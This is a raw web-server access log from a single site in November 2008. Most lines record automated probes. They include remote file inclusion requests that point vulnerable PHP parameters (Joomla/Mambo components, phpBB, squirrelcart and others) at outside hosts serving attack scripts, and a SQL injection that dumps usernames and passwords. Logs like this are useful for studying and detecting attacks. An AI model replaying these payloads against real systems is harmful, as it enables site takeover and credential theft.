203.146.15.54 - - [04/Nov/2008:12:26:29 -0800] "GET /logs/access_080316.log//squirrelcart/cart_content.php?cart_isp_root=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:26:30 -0800] "GET /logs/access_080316.log//squirrelcart/cart_content.php?cart_isp_root=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:12:26:31 -0800] "GET /logs/access_080404.log//newspublish/include.php?path%5Bdocroot%5D=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:12:26:36 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:12:26:36 -0800] "GET /logs/access_080125.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:12:26:36 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.211.29 - - [04/Nov/2008:12:26:37 -0800] "GET /retreat1/webcam/?D=A HTTP/1.1" 200 65194 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:26:43 -0800] "GET /logs/access_080531.log//squirrelcart/cart_content.php?cart_isp_root=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:26:43 -0800] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:26:43 -0800] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:12:26:50 -0800] "GET /logs/access_080702.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:12:26:52 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:12:26:53 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.48.153.200 - - [04/Nov/2008:12:26:56 -0800] "GET /logs/access_080615.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.48.153.200 - - [04/Nov/2008:12:26:57 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.48.153.200 - - [04/Nov/2008:12:27:06 -0800] "GET /logs/access_080524.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
65.55.211.29 - - [04/Nov/2008:12:27:10 -0800] "GET /minamijewelry/source_images/?D=A HTTP/1.1" 200 2414 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:27:24 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:27:25 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:27:25 -0800] "GET /logs/access_080612.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:27:28 -0800] "GET /logs/access_080403.log//squirrelcart/cart_content.php?cart_isp_root=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:27:28 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:27:28 -0800] "GET /logs/access_080403.log//squirrelcart/cart_content.php?cart_isp_root=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:27:28 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:27:35 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:27:44 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:27:50 -0800] "GET /index.php?go=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 200 94728 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:27:54 -0800] "GET /logs/index.php?go=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:27:57 -0800] "GET /logs/access_081007.log/index.php?go=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:28:04 -0800] "GET /logs/index.php?go=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:28:04 -0800] "GET /logs/access_081007.log/index.php?go=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:28:04 -0800] "GET /index.php?go=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 200 94744 "-" "libwww-perl/5.65" "www.dmulk.com"
82.135.199.29 - - [04/Nov/2008:12:28:26 -0800] "GET /logs/access_080228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.uralitel.ru/en/search/cmd.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.97.132.101 - - [04/Nov/2008:12:28:46 -0800] "GET /logs/access_080124.log//index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users-- HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/Nov/2008:12:28:46 -0800] "GET /logs//index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users-- HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/Nov/2008:12:28:47 -0800] "GET /index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users-- HTTP/1.0" 200 95339 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/Nov/2008:12:29:04 -0800] "GET /logs/access_080526.log//index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users-- HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
82.135.199.29 - - [04/Nov/2008:12:29:30 -0800] "GET /logs/access_080609.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.uralitel.ru/en/search/cmd.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:12:29:41 -0800] "GET /logs/access_080419.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:12:29:41 -0800] "GET /logs/access_080915.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:30:11 -0800] "GET /logs/access_080403.log%20//squirrelcart/cart_content.php?cart_isp_root=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:30:14 -0800] "GET /logs/access_080316.log//squirrelcart/cart_content.php?cart_isp_root=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:30:20 -0800] "GET /logs/access_080703.log/index.php?go=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:30:26 -0800] "GET /logs/access_080403.log%20//squirrelcart/cart_content.php?cart_isp_root=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:30:38 -0800] "GET /logs/access_080403.log//squirrelcart/cart_content.php?cart_isp_root=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:30:50 -0800] "GET /logs/access_080229.log//squirrelcart/cart_content.php?cart_isp_root=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:12:31:11 -0800] "GET /logs/access_080810.log/errors.php?error=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:12:31:11 -0800] "GET /errors.php?error=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:12:31:12 -0800] "GET /logs/errors.php?error=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:31:15 -0800] "GET /logs/access_080229.log//squirrelcart/cart_content.php?cart_isp_root=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.108.111 - - [04/Nov/2008:12:31:44 -0800] "GET /logs/errors.php?error=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.108.111 - - [04/Nov/2008:12:31:44 -0800] "GET /errors.php?error=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:31:55 -0800] "GET /logs/access_080703.log/index.php?go=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:32:13 -0800] "GET /homepage.php?sel=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:32:13 -0800] "GET /logs/access_080820.log/homepage.php?sel=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:32:13 -0800] "GET /logs/homepage.php?sel=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:32:13 -0800] "GET /logs/access_080428.log/homepage.php?sel=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:32:28 -0800] "GET /logs/homepage.php?sel=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:32:28 -0800] "GET /homepage.php?sel=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:32:28 -0800] "GET /logs/access_080820.log/homepage.php?sel=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:32:28 -0800] "GET /logs/access_080428.log/homepage.php?sel=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:12:32:58 -0800] "GET /logs/access_080829.log/errors.php?error=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.127.10.105 - - [04/Nov/2008:12:33:46 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.127.10.105 - - [04/Nov/2008:12:33:46 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:34:23 -0800] "GET /logs/access_080927.log%20/homepage.php?sel=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:34:24 -0800] "GET /logs/access_080927.log%20/homepage.php?sel=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.53.141.2 - - [04/Nov/2008:12:35:11 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:12:36:01 -0800] "GET /logs/access_080904.log/index.php?menu=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:12:36:01 -0800] "GET /logs/index.php?menu=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:12:36:05 -0800] "GET /index.php?menu=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 200 65555 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
65.55.211.28 - - [04/Nov/2008:12:36:23 -0800] "GET /?show=slide&pageid=163&nggpage=15 HTTP/1.1" 200 145659 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:36:44 -0800] "GET /logs/access_080820.log/homepage.php?sel=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:36:44 -0800] "GET /logs/homepage.php?sel=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:36:44 -0800] "GET /logs/access_080428.log/homepage.php?sel=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:36:44 -0800] "GET /homepage.php?sel=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
219.94.174.158 - - [04/Nov/2008:12:37:03 -0800] "GET /logs/access_080130.log//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://rubi4.freehostia.com/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.174.158 - - [04/Nov/2008:12:37:04 -0800] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://rubi4.freehostia.com/roxx.jpg??? HTTP/1.1" 404 7984 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:12:37:05 -0800] "GET /logs/access_071030.log HTTP/1.0" 200 28194 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
219.94.174.158 - - [04/Nov/2008:12:37:05 -0800] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://rubi4.freehostia.com/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.174.158 - - [04/Nov/2008:12:37:05 -0800] "GET /logs/access_080406.log//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://rubi4.freehostia.com/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.28 - - [04/Nov/2008:12:38:40 -0800] "GET /?show=slide&pageid=169&nggpage=8 HTTP/1.1" 200 157712 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:12:38:42 -0800] "GET /logs/access_080811.log/errors.php?error=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:12:38:42 -0800] "GET /errors.php?error=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:12:38:42 -0800] "GET /logs/errors.php?error=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.174.158 - - [04/Nov/2008:12:38:57 -0800] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://rubi4.freehostia.com/roxx.jpg??? HTTP/1.1" 404 7984 "-" "libwww-perl/5.79" "www.dmulk.com"
201.6.118.215 - - [04/Nov/2008:12:40:30 -0800] "GET /logs//admin/index.php?o=http://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:12:41:25 -0800] "GET /?show=gallery&pageid=175 HTTP/1.0" 200 165963 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:12:41:30 -0800] "GET /logs/access_080515.log/index.php?menu=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:12:41:35 -0800] "GET /logs/access_080817.log/errors.php?error=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:12:42:50 -0800] "GET /logs/access_080329.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:12:42:50 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
219.94.174.158 - - [04/Nov/2008:12:43:01 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://rubi4.freehostia.com/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:12:43:02 -0800] "GET /logs/access_080218.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:12:43:03 -0800] "GET /logs/access_080329.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:12:43:03 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:12:43:04 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.48.60 - - [04/Nov/2008:12:43:04 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.dutchpokercrew.nl//images/comprofiler/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
67.15.48.60 - - [04/Nov/2008:12:43:04 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.dutchpokercrew.nl//images/comprofiler/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:12:43:15 -0800] "GET /logs/access_080218.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:12:43:30 -0800] "GET /logs/access_071217.log//skin/zero_vote/ask_password.php?dir=http://upfcorp.com/components/.bash/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:12:43:30 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://upfcorp.com/components/.bash/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:12:43:30 -0800] "GET /logs/access_080330.log//skin/zero_vote/ask_password.php?dir=http://upfcorp.com/components/.bash/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:12:43:30 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://upfcorp.com/components/.bash/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
219.94.174.158 - - [04/Nov/2008:12:43:40 -0800] "GET /logs/access_080410.log//include.php?path%5Bdocroot%5D=http://rubi4.freehostia.com/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.174.158 - - [04/Nov/2008:12:43:41 -0800] "GET /include.php?path%5Bdocroot%5D=http://rubi4.freehostia.com/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.174.158 - - [04/Nov/2008:12:43:41 -0800] "GET /logs//include.php?path%5Bdocroot%5D=http://rubi4.freehostia.com/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.29 - - [04/Nov/2008:12:43:43 -0800] "GET /?show=slide&pageid=17&nggpage=15 HTTP/1.1" 200 146552 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
83.148.64.90 - - [04/Nov/2008:12:43:51 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.dutchpokercrew.nl//images/comprofiler/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
83.148.64.90 - - [04/Nov/2008:12:43:51 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.dutchpokercrew.nl//images/comprofiler/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
219.94.174.158 - - [04/Nov/2008:12:43:56 -0800] "GET /logs/access_080513.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://rubi4.freehostia.com/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.174.158 - - [04/Nov/2008:12:43:56 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://rubi4.freehostia.com/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.174.158 - - [04/Nov/2008:12:43:56 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://rubi4.freehostia.com/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
